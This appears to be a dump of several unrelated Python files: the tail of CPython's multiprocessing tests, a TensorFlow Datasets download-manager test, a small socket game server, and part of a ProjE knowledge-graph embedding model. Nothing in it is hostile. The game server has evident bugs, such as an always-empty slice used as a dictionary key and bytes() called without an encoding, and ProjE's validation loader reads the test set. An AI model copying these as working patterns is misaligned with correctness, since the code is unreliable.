d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type.capitalize()
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
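# For example (illustrative): combined with ProcessesMixin below, the base class
# _TestPool is re-exposed as a concrete TestCase named WithProcessesTestPool and
# injected into this module's globals() by create_test_cases().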
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _ThisSubProcess(q):
try:
item = q.get(block=False)
except Queue.Empty:
pass
def _TestProcess(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_ThisSubProcess, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_TestProcess, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
testcases_other = [OtherTest, TestInvalidHandle, TestInitializers,
TestStdinBadfiledescriptor]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, see issue 3111!")
check_enough_semaphores()
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
# (ncoghlan): Whether or not sys.exc_clear is executed by the threading
# module during these tests is at least platform dependent and possibly
# non-deterministic on any given platform. So we don't mind if the listed
# warnings aren't actually raised.
with test_support.check_py3k_warnings(
(".+__(get|set)slice__ has been removed", DeprecationWarning),
(r"sys.exc_clear\(\) not supported", DeprecationWarning),
quiet=True):
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
download_manager_test.py
|
# coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_datasets.core.download.download_manager."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import json
import os
import re
import tempfile
import threading
from absl.testing import absltest
import promise
import tensorflow as tf
from tensorflow_datasets import testing
from tensorflow_datasets.core.download import checksums as checksums_lib
from tensorflow_datasets.core.download import download_manager as dm
from tensorflow_datasets.core.download import resource as resource_lib
ZIP = resource_lib.ExtractMethod.ZIP
TAR = resource_lib.ExtractMethod.TAR
NO_EXTRACT = resource_lib.ExtractMethod.NO_EXTRACT
def _get_promise_on_event(result=None, error=None):
"""Returns (event, Promise). Promise is fulfilled when `event.set()`."""
event = threading.Event()
def callback(resolve, reject):
def inside():
event.wait()
if error is not None:
reject(error)
resolve(result)
t = threading.Thread(target=inside)
t.daemon = True
t.start()
return event, promise.Promise(callback)
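# Usage sketch (illustrative only): the returned promise stays pending until the event
# is set, which lets a test register a fake download result first and release it later:
#
#   done, fake_result = _get_promise_on_event('/dl_dir/foo')
#   self.dl_results[url] = fake_result   # returned by the mocked downloader
#   done.set()                           # only now does the promise resolve to '/dl_dir/foo'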
def _sha256(str_):
return hashlib.sha256(str_.encode('utf8')).hexdigest()
class Artifact(object):
# For testing only.
def __init__(self, name, url=None):
url = url or 'http://foo-bar.ch/%s' % name
content = 'content of %s' % name
self.url = url
self.content = content
self.size = len(content)
self.sha = _sha256(content)
self.size_checksum = (self.size, self.sha)
self.checksum_size = (self.sha, self.size)
self.dl_fname = resource_lib.get_dl_fname(url, self.sha)
self.dl_tmp_dirname = resource_lib.get_dl_dirname(url)
class DownloadManagerTest(testing.TestCase):
def _add_file(self, path, content='', mode='w'):
"""Returns open file handle."""
temp_f = tempfile.NamedTemporaryFile(mode=mode, delete=False)
self.files_content[path] = temp_f.name
temp_f.write(content)
temp_f.close()
self.existing_paths.append(path)
return temp_f
def setUp(self):
self.addCleanup(absltest.mock.patch.stopall)
self.existing_paths = []
self.made_dirs = []
self.dl_results = {}
self.extract_results = {}
self.file_names = {} # resource fname -> original file name
def list_directory(path):
fname = os.path.basename(path).rsplit('.', 2)[0] # suffix is '.tmp.$uuid'
return [self.file_names.get(fname, 'file_with_no_ext')]
self.files_content = {}
def open_(path, mode='r'):
if 'w' in mode:
self._add_file(path)
return open(self.files_content[path], mode)
def rename(from_, to, overwrite=False):
del overwrite
if from_ in self.files_content:
self.existing_paths.append(to)
self.existing_paths.remove(from_)
self.files_content[to] = self.files_content.pop(from_)
self.gfile_patch = absltest.mock.patch.object(
tf.io,
'gfile',
exists=lambda path: path in self.existing_paths,
makedirs=self.made_dirs.append,
# Used to get name of file as downloaded:
listdir=list_directory,
GFile=open_,
rename=absltest.mock.Mock(side_effect=rename),
)
self.gfile = self.gfile_patch.start()
absltest.mock.patch.object(checksums_lib, 'store_checksums').start()
def tearDown(self):
self.gfile_patch.stop()
def _write_info(self, path, info):
content = json.dumps(info, sort_keys=True)
self._add_file(path, content)
def _get_manager(self, force_download=False, force_extraction=False,
checksums=None, dl_dir='/dl_dir',
extract_dir='/extract_dir'):
manager = dm.DownloadManager(
dataset_name='mnist',
download_dir=dl_dir,
extract_dir=extract_dir,
manual_dir='/manual_dir',
force_download=force_download,
force_extraction=force_extraction,
)
if checksums:
manager._sizes_checksums = checksums
download = absltest.mock.patch.object(
manager._downloader,
'download',
side_effect=lambda url, tmpdir_path: self.dl_results[url])
self.downloader_download = download.start()
extract = absltest.mock.patch.object(
manager._extractor,
'extract',
side_effect=lambda path, method, dest: self.extract_results[path])
self.extractor_extract = extract.start()
return manager
def test_download(self):
"""One file in cache, one not."""
a, b, c = [Artifact(i) for i in 'abc']
urls = {
'cached': a.url,
'new': b.url,
'info_deleted': c.url,
}
_ = [self._add_file(path, content) for path, content in [ # pylint: disable=g-complex-comprehension
('/dl_dir/%s' % a.dl_fname, a.content),
('/dl_dir/%s.INFO' % a.dl_fname, 'content of info file a'),
# INFO file of c has been deleted:
('/dl_dir/%s' % c.dl_fname, c.content),
]]
dl_b, self.dl_results[b.url] = _get_promise_on_event(b.checksum_size)
dl_c, self.dl_results[c.url] = _get_promise_on_event(c.checksum_size)
manager = self._get_manager(checksums=dict(
(art.url, art.size_checksum) for art in (a, b, c)))
dl_b.set()
dl_c.set()
downloads = manager.download(urls)
expected = {
'cached': '/dl_dir/%s' % a.dl_fname,
'new': '/dl_dir/%s' % b.dl_fname,
'info_deleted': '/dl_dir/%s' % c.dl_fname,
}
self.assertEqual(downloads, expected)
def test_extract(self):
"""One file already extracted, one file with NO_EXTRACT, one to extract."""
cached = resource_lib.Resource(path='/dl_dir/cached', extract_method=ZIP)
new_ = resource_lib.Resource(path='/dl_dir/new', extract_method=TAR)
no_extract = resource_lib.Resource(path='/dl_dir/noextract',
extract_method=NO_EXTRACT)
files = {
'cached': cached,
'new': new_,
'noextract': no_extract,
}
self.existing_paths.append('/extract_dir/ZIP.cached')
extracted_new, self.extract_results['/dl_dir/new'] = (
_get_promise_on_event('/extract_dir/TAR.new'))
manager = self._get_manager()
extracted_new.set()
res = manager.extract(files)
expected = {
'cached': '/extract_dir/ZIP.cached',
'new': '/extract_dir/TAR.new',
'noextract': '/dl_dir/noextract',
}
self.assertEqual(res, expected)
def test_extract_twice_parallel(self):
# Make sure calling extract twice on same resource actually does the
# extraction once.
extracted_new, self.extract_results['/dl_dir/foo.tar'] = (
_get_promise_on_event('/extract_dir/TAR.foo'))
manager = self._get_manager()
extracted_new.set()
out1 = manager.extract(['/dl_dir/foo.tar', '/dl_dir/foo.tar'])
out2 = manager.extract('/dl_dir/foo.tar')
expected = '/extract_dir/TAR.foo'
self.assertEqual(out1[0], expected)
self.assertEqual(out1[1], expected)
expected = '/extract_dir/TAR.foo'
self.assertEqual(out2, expected)
# Result is memoize so extract has only been called once
self.assertEqual(1, self.extractor_extract.call_count)
def test_download_and_extract(self):
a, b = Artifact('a.zip'), Artifact('b')
self.file_names[a.dl_tmp_dirname] = 'a.zip'
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
dl_b, self.dl_results[b.url] = _get_promise_on_event(b.checksum_size)
ext_a, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/ZIP.%s' % a.dl_fname))
# url_b doesn't need any extraction.
for event in [dl_a, dl_b, ext_a]:
event.set()
# Result is the same after caching:
manager = self._get_manager(checksums={
a.url: a.size_checksum,
b.url: b.size_checksum,
})
res = manager.download_and_extract({'a': a.url, 'b': b.url})
expected = {
'a': '/extract_dir/ZIP.%s' % a.dl_fname,
'b': '/dl_dir/%s' % b.dl_fname,
}
self.assertEqual(res, expected)
def test_download_and_extract_archive_ext_in_fname(self):
# Make sure extraction method is properly deduced from original fname, and
# not from URL.
a = Artifact('a', url='http://a?key=1234')
self.file_names[a.dl_tmp_dirname] = 'a.zip'
dl, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
ext, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/ZIP.%s' % a.dl_fname))
dl.set()
ext.set()
manager = self._get_manager(checksums={
a.url: a.size_checksum,
})
res = manager.download_and_extract({'a': a.url})
expected = {
'a': '/extract_dir/ZIP.%s' % a.dl_fname,
}
self.assertEqual(res, expected)
def test_download_and_extract_already_downloaded(self):
a = Artifact('a.zip')
self.file_names[a.dl_tmp_dirname] = 'a.zip'
# File was already downloaded:
self._add_file('/dl_dir/%s' % a.dl_fname)
self._write_info('/dl_dir/%s.INFO' % a.dl_fname,
{'original_fname': 'a.zip'})
ext_a, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/ZIP.%s' % a.dl_fname))
ext_a.set()
manager = self._get_manager(checksums={
a.url: a.size_checksum,
})
res = manager.download_and_extract(a.url)
expected = '/extract_dir/ZIP.%s' % a.dl_fname
self.assertEqual(res, expected)
def test_force_download_and_extract(self):
a = Artifact('a.tar.gz')
# resource was already downloaded / extracted:
self.existing_paths = ['/dl_dir/%s' % a.dl_fname,
'/extract_dir/TAR_GZ.%s' % a.dl_fname]
self.file_names[a.dl_tmp_dirname] = 'b.tar.gz'
self._write_info('/dl_dir/%s.INFO' % a.dl_fname,
{'original_fname': 'b.tar.gz'})
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
ext_a, self.extract_results['/dl_dir/%s' % a.dl_fname] = (
_get_promise_on_event('/extract_dir/TAR_GZ.%s' % a.dl_fname))
dl_a.set()
ext_a.set()
manager = self._get_manager(
force_download=True, force_extraction=True,
checksums={
a.url: a.size_checksum,
})
res = manager.download_and_extract(a.url)
expected = '/extract_dir/TAR_GZ.%s' % a.dl_fname
self.assertEqual(expected, res)
# Rename after download:
(from_, to), kwargs = self.gfile.rename.call_args
self.assertTrue(re.match(
r'/dl_dir/%s\.tmp\.[a-h0-9]{32}/b.tar.gz' % a.dl_tmp_dirname,
from_))
self.assertEqual('/dl_dir/%s' % a.dl_fname, to)
self.assertEqual(kwargs, {'overwrite': True})
self.assertEqual(1, self.downloader_download.call_count)
self.assertEqual(1, self.extractor_extract.call_count)
def test_wrong_checksum(self):
a = Artifact('a.tar.gz')
sha_b = _sha256('content of another file')
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
dl_a.set()
manager = self._get_manager(checksums={
a.url: (a.size, sha_b),
})
with self.assertRaises(dm.NonMatchingChecksumError):
manager.download(a.url)
self.assertEqual(0, self.extractor_extract.call_count)
def test_ignore_wrong_checksum(self):
a = Artifact('a.tar.gz')
sha_b = _sha256('content of another file')
dl_a, self.dl_results[a.url] = _get_promise_on_event(a.checksum_size)
dl_a.set()
manager = self._get_manager(checksums={
a.url: (a.size, sha_b),
})
manager.set_ignore_checksums(True)
res = manager.download(a.url)
expected = '/dl_dir/%s' % a.dl_fname
self.assertEqual(expected, res)
if __name__ == '__main__':
testing.test_main()
|
server.py
|
import socket
import threading
import board_game as bg
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#serv = socket.gethostbyname(socket.gethostname())
serv = '0.0.0.0'
port = 5959
addr = (serv, port)
s.bind(addr)
player_count = 1
gameboard = bg.Board()
playerList = [0]
actionDict = {"move north": lambda x: gameboard.moveNorth(x),"move south":lambda p: gameboard.moveSouth(p), "move east": lambda p: gameboard.moveEast(p), "move west": lambda p: gameboard.moveWest(p), "fire north":lambda p: gameboard.fireNorth(p), "fire south":lambda p: gameboard.fireSouth(p), "fire east": lambda p: gameboard.fireEast(p), "fire west": lambda p: gameboard.fireWest(p), "echo north":lambda p: gameboard.echoNorth(p), "echo south":lambda p: gameboard.echoSouth(p), "echo east": lambda p: gameboard.echoEast(p), "echo west": lambda p: gameboard.echoWest(p)}
def handle_client(conn, addr):
print(f"New Connection ----> {addr} connected")
    global playerList
    global gameboard
    global player_count
connected = True
conn.send(bytes("YeeeHAw I'm The Blind Bandit and I'm gonna eat you","utf-8"))
playerNum = None
while connected:
msg = conn.recv(1024).decode("utf-8")
msgList = msg.split()
if msg == "Client Connected":
conn.send(bytes("Set Player {}".format(player_count)))
playerList += bg.Player(player_count)
playerNum = player_count
player_count += 1
elif msgList[0] == "0":
actionDict[msg[2:0]](playerList[0])
elif msgList[0] == "1":
actionDict[msg[2:0]](playerList[1])
        if len(gameboard.soundList) != 0:
            num, snd = gameboard.soundList[0]
            if num == playerNum:
                msg = str(playerNum) + " " + snd
                conn.send(bytes(msg, "utf-8"))
                gameboard.soundList.pop(0)
print(msg)
conn.close()
def start():
s.listen()
print(f"Listening on {serv}")
while True:
conn, addr = s.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"Active Connections ----> {threading.activeCount() - 4}")
print ("Server Starting.......")
start()
# NOTE: start() above loops forever, so the code below is never reached. It looks like
# leftover from an earlier two-player prototype and is kept here commented out.
# s.listen(2)
# while True:
#     clientsocket, address = s.accept()
#     print(f"Connection from {address} successful.")
#     clientsocket.send(bytes("James smells weird!", "utf-8"))
|
ProjE_softmax_noweight.py
|
import argparse
import math
import os.path
import timeit
from multiprocessing import JoinableQueue, Queue, Process
import numpy as np
import tensorflow as tf
class ProjE:
@property
def n_entity(self):
return self.__n_entity
@property
def n_train(self):
return self.__train_triple.shape[0]
@property
def trainable_variables(self):
return self.__trainable
@property
def hr_t(self):
return self.__hr_t
@property
def tr_h(self):
return self.__tr_h
@property
def ent_embedding(self):
return self.__ent_embedding
@property
def rel_embedding(self):
return self.__rel_embedding
def training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
hr_tlist, hr_tweight, tr_hlist, tr_hweight = self.corrupted_training(
self.__train_triple[rand_idx[start:end]])
yield hr_tlist, hr_tweight, tr_hlist, tr_hweight
start = end
def raw_training_data(self, batch_size=100):
n_triple = len(self.__train_triple)
rand_idx = np.random.permutation(n_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__train_triple[rand_idx[start:end]]
start = end
def testing_data(self, batch_size=100):
n_triple = len(self.__test_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def validation_data(self, batch_size=100):
n_triple = len(self.__valid_triple)
start = 0
while start < n_triple:
end = min(start + batch_size, n_triple)
yield self.__test_triple[start:end, :]
start = end
def corrupted_training(self, htr):
# [head(tail), relation, #of_total_positive_candidates, positive_instances..., negative_instances...]
hr_tlist = list()
hr_tweight = list()
tr_hlist = list()
tr_hweight = list()
for idx in range(htr.shape[0]):
if np.random.uniform(-1, 1) > 0: # t r predict h
tr_hweight.append(
[1. if x in self.__tr_h[htr[idx, 1]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
tr_hlist.append([htr[idx, 1], htr[idx, 2]])
else: # h r predict t
hr_tweight.append(
[1. if x in self.__hr_t[htr[idx, 0]][htr[idx, 2]] else 0. for x in range(self.__n_entity)])
hr_tlist.append([htr[idx, 0], htr[idx, 2]])
return np.asarray(hr_tlist, dtype=np.int32), np.asarray(hr_tweight, dtype=np.float32), \
np.asarray(tr_hlist, dtype=np.int32), np.asarray(tr_hweight, dtype=np.float32)
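    # Example (illustrative): a triple (h, t, r) routed to the "h r predict t" branch adds
    # the row [h, r] to hr_tlist and a length-n_entity weight row that is 1. at every tail
    # t' with (h, r, t') somewhere in the train/valid/test graph and 0. everywhere else.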
def __init__(self, data_dir, embed_dim=100, combination_method='simple', dropout=0.5, neg_weight=0.5):
if combination_method.lower() not in ['simple', 'matrix']:
raise NotImplementedError("ProjE does not support using %s as combination method." % combination_method)
self.__combination_method = combination_method
self.__embed_dim = embed_dim
self.__initialized = False
self.__trainable = list()
self.__dropout = dropout
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__n_entity = len(f.readlines())
with open(os.path.join(data_dir, 'entity2id.txt'), 'r', encoding='utf-8') as f:
self.__entity_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
self.__id_entity_map = {v: k for k, v in self.__entity_id_map.items()}
print("N_ENTITY: %d" % self.__n_entity)
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__n_relation = len(f.readlines())
with open(os.path.join(data_dir, 'relation2id.txt'), 'r', encoding='utf-8') as f:
self.__relation_id_map = {x.strip().split('\t')[0]: int(x.strip().split('\t')[1]) for x in f.readlines()}
        self.__id_relation_map = {v: k for k, v in self.__relation_id_map.items()}
print("N_RELATION: %d" % self.__n_relation)
def load_triple(file_path):
with open(file_path, 'r', encoding='utf-8') as f_triple:
return np.asarray([[self.__entity_id_map[x.strip().split('\t')[0]],
self.__entity_id_map[x.strip().split('\t')[1]],
self.__relation_id_map[x.strip().split('\t')[2]]] for x in f_triple.readlines()],
dtype=np.int32)
def gen_hr_t(triple_data):
hr_t = dict()
for h, t, r in triple_data:
if h not in hr_t:
hr_t[h] = dict()
if r not in hr_t[h]:
hr_t[h][r] = set()
hr_t[h][r].add(t)
return hr_t
def gen_tr_h(triple_data):
tr_h = dict()
for h, t, r in triple_data:
if t not in tr_h:
tr_h[t] = dict()
if r not in tr_h[t]:
tr_h[t][r] = set()
tr_h[t][r].add(h)
return tr_h
self.__train_triple = load_triple(os.path.join(data_dir, 'train.txt'))
print("N_TRAIN_TRIPLES: %d" % self.__train_triple.shape[0])
self.__test_triple = load_triple(os.path.join(data_dir, 'test.txt'))
print("N_TEST_TRIPLES: %d" % self.__test_triple.shape[0])
self.__valid_triple = load_triple(os.path.join(data_dir, 'valid.txt'))
print("N_VALID_TRIPLES: %d" % self.__valid_triple.shape[0])
self.__train_hr_t = gen_hr_t(self.__train_triple)
self.__train_tr_h = gen_tr_h(self.__train_triple)
self.__test_hr_t = gen_hr_t(self.__test_triple)
self.__test_tr_h = gen_tr_h(self.__test_triple)
self.__hr_t = gen_hr_t(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
self.__tr_h = gen_tr_h(np.concatenate([self.__train_triple, self.__test_triple, self.__valid_triple], axis=0))
bound = 6 / math.sqrt(embed_dim)
with tf.device('/cpu'):
self.__ent_embedding = tf.get_variable("ent_embedding", [self.__n_entity, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=345))
self.__trainable.append(self.__ent_embedding)
self.__rel_embedding = tf.get_variable("rel_embedding", [self.__n_relation, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=346))
self.__trainable.append(self.__rel_embedding)
if combination_method.lower() == 'simple':
self.__hr_weighted_vector = tf.get_variable("simple_hr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__tr_weighted_vector = tf.get_variable("simple_tr_combination_weights", [embed_dim * 2],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=445))
self.__trainable.append(self.__hr_weighted_vector)
self.__trainable.append(self.__tr_weighted_vector)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
else:
self.__hr_combination_matrix = tf.get_variable("matrix_hr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__tr_combination_matrix = tf.get_variable("matrix_tr_combination_layer",
[embed_dim * 2, embed_dim],
initializer=tf.random_uniform_initializer(minval=-bound,
maxval=bound,
seed=555))
self.__trainable.append(self.__hr_combination_matrix)
self.__trainable.append(self.__tr_combination_matrix)
self.__hr_combination_bias = tf.get_variable("combination_bias_hr",
initializer=tf.zeros([embed_dim]))
self.__tr_combination_bias = tf.get_variable("combination_bias_tr",
initializer=tf.zeros([embed_dim]))
self.__trainable.append(self.__hr_combination_bias)
self.__trainable.append(self.__tr_combination_bias)
@staticmethod
def __l1_normalize(x, dim, epsilon=1e-12, name=None):
square_sum = tf.reduce_sum(tf.abs(x), [dim], keep_dims=True)
x_inv_norm = tf.rsqrt(tf.maximum(square_sum, epsilon))
return tf.mul(x, x_inv_norm, name=name)
@staticmethod
def sampled_softmax(tensor, weights):
max_val = tf.reduce_max(tensor * tf.abs(weights), 1, keep_dims=True)
tensor_rescaled = tensor - max_val
tensor_exp = tf.exp(tensor_rescaled)
tensor_sum = tf.reduce_sum(tensor_exp * tf.abs(weights), 1, keep_dims=True)
return (tensor_exp / tensor_sum) * tf.abs(weights) # all ignored elements will have a prob of 0.
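    # Explanatory note (added, not part of the original computation): the weight vector
    # doubles as a mask in sampled_softmax. Entries with weight 0 vanish from both the
    # numerator and the normalising sum, while positive (+1) and sampled negative (-1)
    # labels contribute with |weight| = 1, so the probabilities are renormalised over the
    # labelled candidates only.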
def train(self, inputs, regularizer_weight=1., scope=None):
with tf.variable_scope(scope or type(self).__name__) as scp:
if self.__initialized:
scp.reuse_variables()
rel_embedding = self.__rel_embedding
normalized_ent_embedding = self.__ent_embedding
hr_tlist, hr_tlist_weight, tr_hlist, tr_hlist_weight = inputs
# (?, dim)
hr_tlist_h = tf.nn.embedding_lookup(normalized_ent_embedding, hr_tlist[:, 0])
hr_tlist_r = tf.nn.embedding_lookup(rel_embedding, hr_tlist[:, 1])
# (?, dim)
tr_hlist_t = tf.nn.embedding_lookup(normalized_ent_embedding, tr_hlist[:, 0])
tr_hlist_r = tf.nn.embedding_lookup(rel_embedding, tr_hlist[:, 1])
if self.__combination_method.lower() == 'simple':
# shape (?, dim)
hr_tlist_hr = hr_tlist_h * self.__hr_weighted_vector[
:self.__embed_dim] + hr_tlist_r * self.__hr_weighted_vector[
self.__embed_dim:]
hrt_res = tf.matmul(tf.nn.dropout(tf.tanh(hr_tlist_hr + self.__hr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
tr_hlist_tr = tr_hlist_t * self.__tr_weighted_vector[
:self.__embed_dim] + tr_hlist_r * self.__tr_weighted_vector[
self.__embed_dim:]
trh_res = tf.matmul(tf.nn.dropout(tf.tanh(tr_hlist_tr + self.__tr_combination_bias), self.__dropout),
self.__ent_embedding,
transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_weighted_vector)) + tf.reduce_sum(tf.abs(
self.__tr_weighted_vector)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
else:
hr_tlist_hr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [hr_tlist_h, hr_tlist_r]),
self.__hr_combination_matrix) + self.__hr_combination_bias),
self.__dropout)
hrt_res = tf.matmul(hr_tlist_hr, self.__ent_embedding, transpose_b=True)
tr_hlist_tr = tf.nn.dropout(tf.tanh(tf.matmul(tf.concat(1, [tr_hlist_t, tr_hlist_r]),
self.__tr_combination_matrix) + self.__tr_combination_bias),
self.__dropout)
trh_res = tf.matmul(tr_hlist_tr, self.__ent_embedding, transpose_b=True)
self.regularizer_loss = regularizer_loss = tf.reduce_sum(
tf.abs(self.__hr_combination_matrix)) + tf.reduce_sum(tf.abs(
self.__tr_combination_matrix)) + tf.reduce_sum(tf.abs(self.__ent_embedding)) + tf.reduce_sum(
tf.abs(self.__rel_embedding))
self.hrt_softmax = hrt_res_softmax = self.sampled_softmax(hrt_res, hr_tlist_weight)
hrt_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(hrt_res_softmax, 1e-10, 1.0)) * tf.maximum(0.,
hr_tlist_weight) / tf.reduce_sum(
tf.maximum(0., hr_tlist_weight), 1, keep_dims=True))
self.trh_softmax = trh_res_softmax = self.sampled_softmax(trh_res, tr_hlist_weight)
trh_loss = -tf.reduce_sum(
tf.log(tf.clip_by_value(trh_res_softmax, 1e-10, 1.0)) * tf.maximum(0., tr_hlist_weight) / tf.reduce_sum(
tf.maximum(0., tr_hlist_weight), 1, keep_dims=True))
